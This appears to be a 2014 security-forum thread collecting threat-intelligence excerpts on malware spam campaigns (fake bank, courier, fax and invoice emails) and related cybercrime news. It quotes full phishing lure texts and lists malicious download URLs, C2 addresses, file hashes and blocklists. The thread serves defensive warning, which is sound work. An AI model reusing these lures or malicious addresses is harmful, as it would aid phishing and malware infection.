Fake Nat West SPAM - PDF malware
- http://myonlinesecurity.co.uk/nat-west-bacs-transfer-remittance-jsag828gbp-fake-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 4933.00
Please find details at our secure link below: ...
This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/natwest-new-secure-message-file-4430-fake-pdf-malware/
- https://www.virustotal.com/en/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu/2014/09/16/fake-email-fwd-dhl-delivery-attempt-contains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
You may rearrange delivery by visiting the link on the attached document or pick up the item at the DHL depot/office indicated on the receipt attached.
If the package is not rescheduled for delivery or picked up within 48 hours, it will be returned to the sender.
Airway Bill No: 7808130095
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
Print this label to get this package at our depot/office.
Thank you
© 2014 Copyright© 2013 DHL. All Rights Reserved...
The attached ZIP file has the name DHL EXPRESS DELIVERY ATTEMPT.zip and contains the 293 kB large file DHL EXPRESS DELIVERY ATTEMPT.exe. The trojan is known as Trojan/Win32.Necurs, a variant of Win32/Injector.BLYN, W32/Injector.GLA!tr, Backdoor.Bot or Win32.Trojan.Bp-generic.Ixrn. At the time of writing, 6 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/57d37614dd81d48c25bec02f4481e1757cd7a5b84ccc31904635a51d70db1a44/analysis/1410870424/
:fear::fear: :mad:
AplusWebMaster
2014-09-17, 13:20
FYI...
Fake FAX SPAM - malware
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-no-you-havent.html
17 Sep 2014 - "This tired old spam format comes with warmed-over malware attachment.
From: Fax [fax@ victimdomain .com]
Date: 17 September 2014 09:32
Subject: You've received a new fax
New fax at SCAN6405035 from EPSON by https ://victimdomain .com
Scan date: Wed, 17 Sep 2014 16:32:29 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)
The link in the email downloads an archive file Message_Document_pdf.zip from the same estudiocarraro .com .br site. This has a VirusTotal detection rate of 3/54*. The ThreatTrack report shows that the malware attempts to phone home to:
denis-benker .de/teilen/1709uk1.hit
188.165.204.210/1709uk1/NODE01/0/51-SP3/0/
188.165.204.210/1709uk1/NODE01/1/0/0/
188.165.204.210/1709uk1/NODE01/41/5/4/
Recommended blocklist:
188.165.204.210
denis-benker .de
estudiocarraro .com.br"
* https://www.virustotal.com/en-gb/file/01e69a84cd47f38786affe7348fb334f2092984fa11444352ee5a0431c505f6d/analysis/1410943351/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
___
Fake ADP Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-pdf-malware/
17 Sep 2014 - "'ADP Invoice' pretending to come from billing.address.updates@ adp .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... we always say don’t open any attachment or file sent to you in an email, but with fake or malicious PDF files that is quite difficult.
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/adp-invoice-with-malicious-pdf.png
17 September 2014: adp_invoice_46887645.pdf
Current Virus total detections: 8/55* . This ADP Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2653224f479aa10f4e82b489987bb519f563786b676bacb76a5efba2963cd546/analysis/1410974477/
___
Android Malware uses SSL for Evasion
- http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-use-ssl-for-evasion/
Sep 17, 2014 - "... a double-edged sword. Android malware is now utilizing SSL to hide their routines and to evade detection. SSL servers have become a target of Android malware. Malware can use any of the three types of servers... This malware steals user and device information, such as the IMEI, phone number, and images stored in the SD card. Whenever the user starts the app or once the phone reboots, the app will start a backend service to dump the aforementioned information and use a hard-coded Gmail account and password to send the information to a particular email address... ANDROIDOS_TRAMP.HAT attempts to disguise itself as an official Google service. It collects user information like the phone number, location, and contact list. Upon execution, it registers GCMBroadCastReceiver. The malicious app will then post the -stolen- data via Google Cloud Messaging. Google Cloud Messaging is used for C&C communication of the malicious app. Commands such as “send message,” “block call,” and “get current location” are sent and received via Google Cloud Messaging... ANDROIDOS_BACKDOORSNSTWT.A triggers its C&C attack through Twitter. The malware crawls for Twitter URLs and combine the obtained information with a hard-coded string to generate a new C&C URL for attacks. The stolen information is sent to the generated URL... Cybercriminals may have also targeted SSL servers and services because because they do not need to exert much effort into gaining access to these sites. They can do so via normal and legal means, such as buying a virtual host from web-hosting services or registering a new account on Twitter. Should we see more use (and abuse) of SSL, detecting malicious apps may not be enough. Collaboration with server providers and services will be needed in removing related URLs, email addresses, and the like. Given the constant evolution of Android malware, we advise users to download Android apps only from legitimate sources. Third-party app stores may not be as strict when it comes to scanning for potentially malicious apps. We also advise users to use a security solution that can detect and block threats that may cause harm to mobile devices..."
(More detail at the trendmicro URL above.)
___
Fake UKFast invoice SPAM – malware attachment
- http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/
17 Sep 2014 - "'UKFast invoice' pretending to come from UKFast Accounts <accounts@ ukfast .co.uk>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subject line and the to: lines on these emails are blank...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/ukfast-invoice.png
17 September 2014: Invoice-17009106-001.zip ( 137 kb): Extracts to: Invoice 17009106-001.exe
Current Virus total detections: 0/55* . This UKFast invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/200ef318f11db4e3975159b378a48bf2d6420c3a48d7f4c75efe1cb2acbc22b8/analysis/1410939664/
___
Fake Invoice SPAM ...
- http://myonlinesecurity.co.uk/strabane-weekly-news-inv0071981-newspaper-copy-fake-pdf-malware/
17 Sep 2014 - "'Strabane Weekly News INV0071981 – Newspaper copy' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... - same- malware as one version of today’s UKFast invoice – fake PDF malware*... The email looks like:
Dear Sir,
Please find attached the copy of the advert for INV0071981 in the Strabane Weekly News.
Thank you,
Darragh
This 'Strabane Weekly News INV0071981 – Newspaper copy' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/ukfast-invoice-fake-pdf-malware/
:fear: :mad:
AplusWebMaster
2014-09-18, 14:35
FYI...
Fake NatWest SPAM - malware attached
- http://blog.dynamoo.com/2014/09/important-new-account-invoice-spam.html
18 Sep 2014 - "This -fake- NatWest invoice (since when did banks send invoices?) leads to a malicious ZIP file.
From: NatWest Invoice [invoice@ natwest .com]
Date: 18 September 2014 11:06
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below ...
Thank you for choosing NatWest...
The link in this particular email goes to bnsoutlaws .co.uk/qvgstopmdi/njfeziackv.html which then downloads a ZIP file from bnsoutlaws .co.uk/qvgstopmdi/Account_Document.zip which in turn contains a malicious executable Account_Document.scr which has a VirusTotal detection rate of just 1/53*. The ThreatTrack report [pdf] shows that the malware attempts to call home...
Recommended blocklist:
188.165.204.210
liverpoolfc .bg
bnsoutlaws .co.uk "
* https://www.virustotal.com/en-gb/file/9202af35dbf5620096a42766582f231654c74677ee3dcb70a5af6d178fcc0163/analysis/1411032337/
... Behavioural information
TCP connections
91.215.216.52: https://www.virustotal.com/en-gb/ip-address/91.215.216.52/information/
188.165.204.210: https://www.virustotal.com/en-gb/ip-address/188.165.204.210/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
UPDATE: The -same- malware is also being pushed by a fake Lloyds Bank email..
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 18 September 2014 11:45
Subject: Important - Commercial Documents
Important account documents
Reference: C146
Case number: 68819453
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
- http://myonlinesecurity.co.uk/nat-west-important-new-account-invoice-fake-pdf-malware/
18 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Nat-West-New-account-invoice.png
___
Fake eFax SPAM - PDF malware
- http://myonlinesecurity.co.uk/efax-report-fake-pdf-malware/
18 Sep 2014 - "'eFax Report' pretending to come from eFax Report <noreply@ efax-reports .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
INCOMING FAX REPORT
Date/Time: Thursday, 18.09.2014
Speed: 353bps
Connection time: 08:02
Page: 4
Resolution: Normal
Remote ID: 611-748-177946
Line number: 3
DTMF/DID:
Description: Internal only ...
18 September 2014: fax-id9182719182837529.zip ( 189 kb): Extracts to: fax-id9182719182837529.scr
Current Virus total detections: 1/54* . This eFax Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5a6c3fdd158c157b0c7e4293ad0a56b8ef2b2ececd68b4c075fc4b8cc16f6922/analysis/1411049220/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Line Voice Message Spam
- http://threattrack.tumblr.com/post/97827881718/line-voice-message-spam
18 Sep 2014 - "Subjects Seen:
You have a voice message
Typical e-mail details:
LINE Notification
You have a voice message, listen it now.
Time: 21:12:45 14.10.2014, Duration: 45sec
Malicious URLs:
iagentnetwork .com/sql.php?line=gA7EF9bA7ns68jJ0eBi8ww
Malicious File Name and MD5:
LINE_Call_<phone number>.zip (7FC6D33F62942B55AD94F20BDC7A3797)
LINE_Call_<phone number>.exe (C3E0F4356A77D18438A38110F8BD919E)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ad77337f36ff7e57db548378c0b961b2/tumblr_inline_nc4325Jmds1r6pupn.png
Tagged: Line.me, Kuluoz
147.202.201.24: https://www.virustotal.com/en/ip-address/147.202.201.24/information/
:mad: :fear::fear:
AplusWebMaster
2014-09-19, 15:13
FYI...
Fake 'voice mail' SPAM ...
- http://blog.dynamoo.com/2014/09/this-fake-voice-mail-message-leads-to.html
19 Sep 2014 - "This -fake- voice mail message leads to malware:
From: Microsoft Outlook [no-reply@ victimdomain .com]
Date: 19 September 2014 11:59
Subject: You have received a voice mail
You received a voice mail : VOICE976-588-6749.wav (25 KB)
Caller-Id: 976-588-6749
Message-Id: D566Y5
Email-Id: <REDACTED>
Download and extract to listen the message.
We have uploaded voicemail report on dropbox, please use the following link to download your file...
Sent by Microsoft Exchange Server
The link in the email messages goes to www .prolococapena .com/yckzpntfyl/mahlqhltkh.html first and then downloads a file from www .prolococapena .com/yckzpntfyl/Invoice102740_448129486142_pdf.zip which contains exactly the -same- malicious executable being pushed in this earlier spam run*."
* http://blog.dynamoo.com/2014/09/natwest-statement-spam-yet-again.html
19 Sep 2014 - "... shows network activity to hallerindia .com on 192.185.97.223. I would suggest that this is a good domain to -block- ..."
Screenshot: https://2.bp.blogspot.com/-Oo5Lnrowt70/VBwJo-dVgRI/AAAAAAAAFpY/TzfWXXSEP88/s1600/natwest.png
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
- http://myonlinesecurity.co.uk/natwest-statement-fake-pdf-malware/
19 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/nat-west-statement.png
Current Virus total detections: 1/54*
* https://www.virustotal.com/en/file/a56ef62b4154849c04b28dd78ff2d4d383c98eb7e38785c10e9b58932f3dc0ca/analysis/1411120481/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'Police Suspect' SPAM - PDF malware
- http://myonlinesecurity.co.uk/city-london-police-homicide-suspect-fake-pdf-malware/
19 Sep 2014 - "'City of London Police Homicide Suspect' pretending to come from City of London Police is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: London City Police
Sending Location: GB – London – London City Police
Bulletin Case#: 14-62597
Bulletin Author: BARILLAS #1169
Sending User #: 92856
APBnet Version: 684593
The bulletin is a pdf attachment to this email.
The Adobe Reader (from Adobe .com) will display and print the bulletin best.
You can Not reply to the bulletin by clicking on the Reply button in your email software.
Of course it is -fake- and -not- from any Police force or Police service in UK or worldwide.
19 September 2014: Homicide-case#15808_pdf.zip : Extracts to: Homicide-case#15808_pdf.exe
Current Virus total detections: 4/55* . This 'City of London Police Homicide Suspect' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411120670/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___
Fake 'Courier Svc' SPAM - PDF malware
- http://myonlinesecurity.co.uk/tnt-courier-service-tnt-uk-limited-package-tracking-fake-pdf-malware/
19 Sep 2014 - "'TNT UK Limited Package tracking' pretending to come from TNT COURIER SERVICE <tracking@tnt.co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: 460911612900
Your package have been picked up and is ready for dispatch.
Connote # : 460911612900
Service Type : Export Non Documents – Intl
Shipped on : 18 Sep 14 12:00
Order No : 4240629
Status : Driver’s Return
Description : Wrong Address
Service Options: You are required to select a service option below.
The options, together with their associated conditions.
Please check attachment to view information about the sender and package.
19 September 2014: Label_GB1909201488725UK_pdf.zip: Extracts to: Label_GB1909201488725UK_pdf.exe
Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ae7f419e0093fd2d4892ea6920aaa2c12c95cede9c97cb0a1f096496d4ff93ea/analysis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
192.185.97.223: https://www.virustotal.com/en/ip-address/192.185.97.223/information/
___
Bitcoin Ponzi scheme ...
- http://www.reuters.com/article/2014/09/19/us-sec-bitcoin-fraud-idUSKBN0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___
Apple Phish ...
- https://isc.sans.edu/diary.html?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer. If you need help, please visit the Apple Support.
Apple Client Support.
A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___
Hack the ad network like a boss...
- https://www.virusbtn.com/blog/2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn.com/images/news/general_malicious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn.com/images/news/youtube_malicious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."
:fear::fear: :mad:
AplusWebMaster
2014-09-22, 15:04
FYI...
Fake gov't SPAM
- http://blog.dynamoo.com/2014/09/your-online-gatewaygovuk-submission-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:
Screenshot: https://4.bp.blogspot.com/-O44byyBpvKE/VCACHn_z67I/AAAAAAAAFro/5VfC-5YRsOw/s1600/gateway.png
The link in the email does -not- go to gateway .gov.uk at all, but in this case the the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411383282/
184.168.152.32: https://www.virustotal.com/en-gb/ip-address/184.168.152.32/information/
** https://anubis.iseclab.org/?action=result&task_id=19b13cf14c76380345d98780f5ac50f82&format=html
- http://myonlinesecurity.co.uk/online-gateway-gov-uk-submission-fake-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Your-online-Gateway.gov_.uk-Submission.png
...
> https://www.virustotal.com/en-gb/file/146272b3c4119591adb7fd3f032a6f810a4bd8bd62109792eece587a0ac5c41d/analysis/1411381013/
___
Fake 'LogMeIn' SPAM – malware
- http://myonlinesecurity.co.uk/september-22-2014-logmein-security-update-malware/
22 Sep 2014"'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com>is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear client,
We are pleased to announce that LogMeIn has released a new security certificate.
It contains new features:
• The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
• Any irregular activity on your account will be detected by our security department
• This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
Download the attached certificate. Update will be automatically installed by double click.
As always, your Logmein Support Team is happy to assist with any questions you may have.
Feel free to contact us ...
22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/
- https://isc.sans.edu/diary.html?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu/diaryimages/images/Screen%20Shot%202014-09-22%20at%2011_34_06%20AM.png
...
> https://www.virustotal.com/en/file/a3cf855b9bfbb17e4e293c6d28290de4329338a988b5c6a33e35e7bc6f3b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustotal.com/en/ip-address/23.253.218.205/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustotal.com/en/ip-address/95.101.0.104/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustotal.com/en/ip-address/65.112.221.20/information/
TCP connections
23.253.218.205: https://www.virustotal.com/en/ip-address/23.253.218.205/information/
95.101.0.83: https://www.virustotal.com/en/ip-address/95.101.0.83/information/
38.229.70.4: https://www.virustotal.com/en/ip-address/38.229.70.4/information/
___
Fake USAA SPAM - PDF malware
- http://myonlinesecurity.co.uk/usaa-policy-renewal-please-print-auto-id-cards-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/USAA-Policy-Renewal-Please-Print-Auto-ID-Cards.png
22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411415107/
- http://threattrack.tumblr.com/post/98225075443/usaa-insurance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/37ba5ffb65ea0fbf4857f1d0fee84e0b/tumblr_inline_nccw5e1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___
Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-invoices-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
Thank you.
22 September 2014: invoice058342.pdf . Current Virus total detections: 10/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/644635d9cebfd696dd0e71eefce400ac744713b846ef3fb2df8268a1b48cd4cc/analysis/1411409482/
___
Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-issued-fake-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
Yours faithfully,
Global Payments and Cash Management
This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.
... this drops a slightly different malware paymentadvice .exe with a current VT detections 0/53* . This HSBC Payment Advice Issued is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/844c016c9df09432f82f2a353151ca110c2474c7cb5f09c54ebc64952dd1174d/analysis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Invoice SPAM
- http://myonlinesecurity.co.uk/peter-hogarth-sons-ltd-invoice-642555-fake-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your Invoice(s)/Credit(s)
PETER HOGARTH & SONS LTD
INDUSTRIAL HYGIENE and PROTECTION
Tel: 01472 345726 | Fax: 01472 250272 | Web...
Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
Peter Hogarth & Sons Ltd is a company registered in England.
Company Registration Number: 1143352...
22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/809f5007e7e771dbb791d08e166770b17c2de15908b300ef1a241ac9f23215d3/analysis/1411380202/
___
European banks / Europol in cybercrime fightback
- http://www.reuters.com/article/2014/09/22/banks-cybersecurity-europe-idUSL6N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."
:mad: :fear:
AplusWebMaster
2014-09-23, 13:48
FYI...
Fake 'Voice Mail' SPAM
- http://blog.dynamoo.com/2014/09/according-to-this-spam-you-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...
The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/
** http://anubis.iseclab.org/?action=result&task_id=1ac4290d6f92ed1044d41585aeff6b27a&format=html
- http://myonlinesecurity.co.uk/new-voice-fake-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
